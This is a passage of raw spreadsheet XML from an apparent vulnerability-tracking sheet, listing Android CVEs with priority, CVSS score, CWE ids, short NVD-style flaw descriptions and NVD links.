t="inlineStr"><is><t>NVD</t></is></c><c r="O428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P428" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q428" s="5" t="inlineStr" /><c r="R428" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S428" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T428" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t></is></c></row><row r="429"><c r="A429" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C429" s="5" t="inlineStr"><is><t>CVE-2026-28642</t></is></c><c r="D429" s="5" t="n"><v>7.8</v></c><c r="E429" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F429" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G429" s="5" t="inlineStr" /><c r="H429" s="5" t="n"><v>0.001</v></c><c r="I429" s="5" t="inlineStr" /><c r="J429" s="5" t="inlineStr" /><c r="K429" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L429" s="5" t="inlineStr" /><c r="M429" s="5" t="inlineStr" /><c r="N429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P429" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q429" s="5" t="inlineStr" /><c r="R429" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S429" s="5" t="inlineStr"><is><t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T429" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t></is></c></row><row r="430"><c r="A430" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C430" s="5" t="inlineStr"><is><t>CVE-2026-28644</t></is></c><c r="D430" s="5" t="n"><v>7.8</v></c><c r="E430" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F430" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G430" s="5" t="inlineStr" /><c r="H430" s="5" t="n"><v>0.001</v></c><c r="I430" s="5" t="inlineStr" /><c r="J430" s="5" t="inlineStr" /><c r="K430" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L430" s="5" t="inlineStr" /><c r="M430" s="5" t="inlineStr" /><c r="N430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P430" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q430" s="5" t="inlineStr" /><c r="R430" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S430" s="5" t="inlineStr"><is><t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T430" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t></is></c></row><row r="431"><c r="A431" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C431" s="5" t="inlineStr"><is><t>CVE-2026-28650</t></is></c><c r="D431" s="5" t="n"><v>7.8</v></c><c r="E431" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F431" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G431" s="5" t="inlineStr" /><c r="H431" s="5" t="n"><v>0.001</v></c><c r="I431" s="5" t="inlineStr" /><c r="J431" s="5" t="inlineStr" /><c r="K431" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L431" s="5" t="inlineStr" /><c r="M431" s="5" t="inlineStr" /><c r="N431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P431" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q431" s="5" t="inlineStr" /><c r="R431" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S431" s="5" t="inlineStr"><is><t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T431" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t></is></c></row><row r="432"><c r="A432" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C432" s="5" t="inlineStr"><is><t>CVE-2026-28653</t></is></c><c r="D432" s="5" t="n"><v>7.8</v></c><c r="E432" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F432" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G432" s="5" t="inlineStr" /><c r="H432" s="5" t="n"><v>0.001</v></c><c r="I432" s="5" t="inlineStr" /><c r="J432" s="5" t="inlineStr" /><c r="K432" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L432" s="5" t="inlineStr" /><c r="M432" s="5" t="inlineStr" /><c r="N432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P432" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q432" s="5" t="inlineStr" /><c r="R432" s="5" t="inlineStr"><is><t>CWE-1190, CWE-787</t></is></c><c r="S432" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T432" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t></is></c></row><row r="433"><c r="A433" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C433" s="5" t="inlineStr"><is><t>CVE-2026-28655</t></is></c><c r="D433" s="5" t="n"><v>7.8</v></c><c r="E433" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F433" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G433" s="5" t="inlineStr" /><c r="H433" s="5" t="n"><v>0.001</v></c><c r="I433" s="5" t="inlineStr" /><c r="J433" s="5" t="inlineStr" /><c r="K433" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L433" s="5" t="inlineStr" /><c r="M433" s="5" t="inlineStr" /><c r="N433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P433" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q433" s="5" t="inlineStr" /><c r="R433" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S433" s="5" t="inlineStr"><is><t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T433" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t></is></c></row><row r="434"><c r="A434" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C434" s="5" t="inlineStr"><is><t>CVE-2026-28657</t></is></c><c r="D434" s="5" t="n"><v>7.8</v></c><c r="E434" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F434" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G434" s="5" t="inlineStr" /><c r="H434" s="5" t="n"><v>0.001</v></c><c r="I434" s="5" t="inlineStr" /><c r="J434" s="5" t="inlineStr" /><c r="K434" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L434" s="5" t="inlineStr" /><c r="M434" s="5" t="inlineStr" /><c r="N434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P434" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q434" s="5" t="inlineStr" /><c r="R434" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S434" s="5" t="inlineStr"><is><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is></c><c r="T434" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t></is></c></row><row r="435"><c r="A435" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C435" s="5" t="inlineStr"><is><t>CVE-2026-28658</t></is></c><c r="D435" s="5" t="n"><v>7.8</v></c><c r="E435" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F435" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G435" s="5" t="inlineStr" /><c r="H435" s="5" t="n"><v>0.001</v></c><c r="I435" s="5" t="inlineStr" /><c r="J435" s="5" t="inlineStr" /><c r="K435" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L435" s="5" t="inlineStr" /><c r="M435" s="5" t="inlineStr" /><c r="N435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P435" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q435" s="5" t="inlineStr" /><c r="R435" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S435" s="5" t="inlineStr"><is><t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T435" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t></is></c></row><row r="436"><c r="A436" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C436" s="5" t="inlineStr"><is><t>CVE-2026-28659</t></is></c><c r="D436" s="5" t="n"><v>7.8</v></c><c r="E436" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G436" s="5" t="inlineStr" /><c r="H436" s="5" t="n"><v>0.001</v></c><c r="I436" s="5" t="inlineStr" /><c r="J436" s="5" t="inlineStr" /><c r="K436" s="5" t="inlineStr"><is><t>google:android_xr</t></is></c><c r="L436" s="5" t="inlineStr" /><c r="M436" s="5" t="inlineStr" /><c r="N436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P436" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q436" s="5" t="inlineStr" /><c r="R436" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S436" s="5" t="inlineStr"><is><t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T436" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t></is></c></row><row r="437"><c r="A437" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C437" s="5" t="inlineStr"><is><t>CVE-2026-28663</t></is></c><c r="D437" s="5" t="n"><v>7.8</v></c><c r="E437" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F437" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G437" s="5" t="inlineStr" /><c r="H437" s="5" t="n"><v>0.001</v></c><c r="I437" s="5" t="inlineStr" /><c r="J437" s="5" t="inlineStr" /><c r="K437" s="5" t="inlineStr" /><c r="L437" s="5" t="inlineStr" /><c r="M437" s="5" t="inlineStr" /><c r="N437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P437" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q437" s="5" t="inlineStr" /><c r="R437" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S437" s="5" t="inlineStr"><is><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is></c><c r="T437" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t></is></c></row><row r="438"><c r="A438" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C438" s="5" t="inlineStr"><is><t>CVE-2026-28664</t></is></c><c r="D438" s="5" t="n"><v>7.8</v></c><c r="E438" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F438" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G438" s="5" t="inlineStr" /><c r="H438" s="5" t="n"><v>0.001</v></c><c r="I438" s="5" t="inlineStr" /><c r="J438" s="5" t="inlineStr" /><c r="K438" s="5" t="inlineStr" /><c r="L438" s="5" t="inlineStr" /><c r="M438" s="5" t="inlineStr" /><c r="N438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q438" s="5" t="inlineStr" /><c r="R438" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S438" s="5" t="inlineStr"><is><t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T438" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t></is></c></row><row r="439"><c r="A439" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C439" s="5" t="inlineStr"><is><t>CVE-2026-28668</t></is></c><c r="D439" s="5" t="n"><v>7.8</v></c><c r="E439" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F439" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G439" s="5" t="inlineStr" /><c r="H439" s="5" t="n"><v>0.001</v></c><c r="I439" s="5" t="inlineStr" /><c r="J439" s="5" t="inlineStr" /><c r="K439" s="5" t="inlineStr" /><c r="L439" s="5" t="inlineStr" /><c r="M439" s="5" t="inlineStr" /><c r="N439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P439" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q439" s="5" t="inlineStr" /><c r="R439" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S439" s="5" t="inlineStr"><is><t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T439" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t></is></c></row><row r="440"><c r="A440" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C440" s="5" t="inlineStr"><is><t>CVE-2026-45515</t></is></c><c r="D440" s="5" t="n"><v>7.8</v></c><c r="E440" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F440" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G440" s="5" t="inlineStr" /><c r="H440" s="5" t="n"><v>0.001</v></c><c r="I440" s="5" t="inlineStr" /><c r="J440" s="5" t="inlineStr" /><c r="K440" s="5" t="inlineStr" /><c r="L440" s="5" t="inlineStr" /><c r="M440" s="5" t="inlineStr" /><c r="N440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P440" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q440" s="5" t="inlineStr" /><c r="R440" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S440" s="5" t="inlineStr"><is><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is></c><c r="T440" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t></is></c></row><row r="441"><c r="A441" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C441" s="5" t="inlineStr"><is><t>CVE-2026-45520</t></is></c><c r="D441" s="5" t="n"><v>7.8</v></c><c r="E441" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F441" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G441" s="5" t="inlineStr" /><c r="H441" s="5" t="n"><v>0.001</v></c><c r="I441" s="5" t="inlineStr" /><c r="J441" s="5" t="inlineStr" /><c r="K441" s="5" t="inlineStr" /><c r="L441" s="5" t="inlineStr" /><c r="M441" s="5" t="inlineStr" /><c r="N441" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O441" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P441" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q441" s="5" t="inlineStr" /><c r="R441" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S441" s="5" t="inlineStr"><is><t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T441" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t></is></c></row><row r="442"><c r="A442" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B442" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C442" s="5" t="inlineStr"><is><t>CVE-2026-45531</t></is></c><c r="D442" s="5" t="n"><v>7.8</v></c><c r="E442" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F442" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G442" s="5" t="inlineStr" /><c r="H442" s="5" t="n"><v>0.001</v></c><c r="I442" s="5" t="inlineStr" /><c r="J442" s="5" t="inlineStr" /><c r="K442" s="5" t="inlineStr" /><c r="L442" s="5" t="inlineStr" /><c r="M442" s="5" t="inlineStr" /><c r="N442" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O442" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P442" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q442" s="5" t="inlineStr" /><c r="R442" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S442" s="5" t="inlineStr"><is><t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T442" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t></is></c></row><row r="443"><c r="A443" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B443" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C443" s="5" t="inlineStr"><is><t>CVE-2026-49881</t></is></c><c r="D443" s="5" t="n"><v>7.8</v></c><c r="E443" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F443" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G443" s="5" t="inlineStr" /><c r="H443" s="5" t="n"><v>0.001</v></c><c r="I443" s="5" t="inlineStr" /><c r="J443" s="5" t="inlineStr" /><c r="K443" s="5" t="inlineStr" /><c r="L443" s="5" t="inlineStr" /><c r="M443" s="5" t="inlineStr" /><c r="N443" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O443" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P443" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q443" s="5" t="inlineStr" /><c r="R443" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S443" s="5" t="inlineStr"><is><t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T443" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t></is></c></row><row r="444"><c r="A444" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C444" s="5" t="inlineStr"><is><t>CVE-2026-49884</t></is></c><c r="D444" s="5" t="n"><v>7.8</v></c><c r="E444" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F444" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G444" s="5" t="inlineStr" /><c r="H444" s="5" t="n"><v>0.001</v></c><c r="I444" s="5" t="inlineStr" /><c r="J444" s="5" t="inlineStr" /><c r="K444" s="5" t="inlineStr" /><c r="L444" s="5" t="inlineStr" /><c r="M444" s="5" t="inlineStr" /><c r="N444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P444" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q444" s="5" t="inlineStr" /><c r="R444" s="5" t="inlineStr"><is><t>CWE-120</t></is></c><c r="S444" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T444" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t></is></c></row><row r="445"><c r="A445" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C445" s="5" t="inlineStr"><is><t>CVE-2026-49887</t></is></c><c r="D445" s="5" t="n"><v>7.8</v></c><c r="E445" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F445" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G445" s="5" t="inlineStr" /><c r="H445" s="5" t="n"><v>0.001</v></c><c r="I445" s="5" t="inlineStr" /><c r="J445" s="5" t="inlineStr" /><c r="K445" s="5" t="inlineStr" /><c r="L445" s="5" t="inlineStr" /><c r="M445" s="5" t="inlineStr" /><c r="N445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P445" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q445" s="5" t="inlineStr" /><c r="R445" s="5" t="inlineStr"><is><t>CWE-288</t></is></c><c r="S445" s="5" t="inlineStr"><is><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is></c><c r="T445" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t></is></c></row><row r="446"><c r="A446" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C446" s="5" t="inlineStr"><is><t>CVE-2026-49918</t></is></c><c r="D446" s="5" t="n"><v>7.8</v></c><c r="E446" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F446" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G446" s="5" t="inlineStr" /><c r="H446" s="5" t="n"><v>0.001</v></c><c r="I446" s="5" t="inlineStr" /><c r="J446" s="5" t="inlineStr" /><c r="K446" s="5" t="inlineStr" /><c r="L446" s="5" t="inlineStr" /><c r="M446" s="5" t="inlineStr" /><c r="N446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q446" s="5" t="inlineStr" /><c r="R446" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S446" s="5" t="inlineStr"><is><t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T446" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t></is></c></row><row r="447"><c r="A447" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C447" s="5" t="inlineStr"><is><t>CVE-2026-49919</t></is></c><c r="D447" s="5" t="n"><v>7.8</v></c><c r="E447" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F447" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G447" s="5" t="inlineStr" /><c r="H447" s="5" t="n"><v>0.001</v></c><c r="I447" s="5" t="inlineStr" /><c r="J447" s="5" t="inlineStr" /><c r="K447" s="5" t="inlineStr" /><c r="L447" s="5" t="inlineStr" /><c r="M447" s="5" t="inlineStr" /><c r="N447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q447" s="5" t="inlineStr" /><c r="R447" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S447" s="5" t="inlineStr"><is><t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T447" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t></is></c></row><row r="448"><c r="A448" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C448" s="5" t="inlineStr"><is><t>CVE-2026-49927</t></is></c><c r="D448" s="5" t="n"><v>7.8</v></c><c r="E448" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F448" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G448" s="5" t="inlineStr" /><c r="H448" s="5" t="n"><v>0.001</v></c><c r="I448" s="5" t="inlineStr" /><c r="J448" s="5" t="inlineStr" /><c r="K448" s="5" t="inlineStr" /><c r="L448" s="5" t="inlineStr" /><c r="M448" s="5" t="inlineStr" /><c r="N448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q448" s="5" t="inlineStr" /><c r="R448" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="S448" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T448" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t></is></c></row><row r="449"><c r="A449" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C449" s="5" t="inlineStr"><is><t>CVE-2026-49932</t></is></c><c r="D449" s="5" t="n"><v>7.8</v></c><c r="E449" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F449" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G449" s="5" t="inlineStr" /><c r="H449" s="5" t="n"><v>0.001</v></c><c r="I449" s="5" t="inlineStr" /><c r="J449" s="5" t="inlineStr" /><c r="K449" s="5" t="inlineStr" /><c r="L449" s="5" t="inlineStr" /><c r="M449" s="5" t="inlineStr" /><c r="N449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q449" s="5" t="inlineStr" /><c r="R449" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S449" s="5" t="inlineStr"><is><t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t></is></c></row><row r="450"><c r="A450" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C450" s="5" t="inlineStr"><is><t>CVE-2026-55273</t></is></c><c r="D450" s="5" t="n"><v>7.8</v></c><c r="E450" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F450" 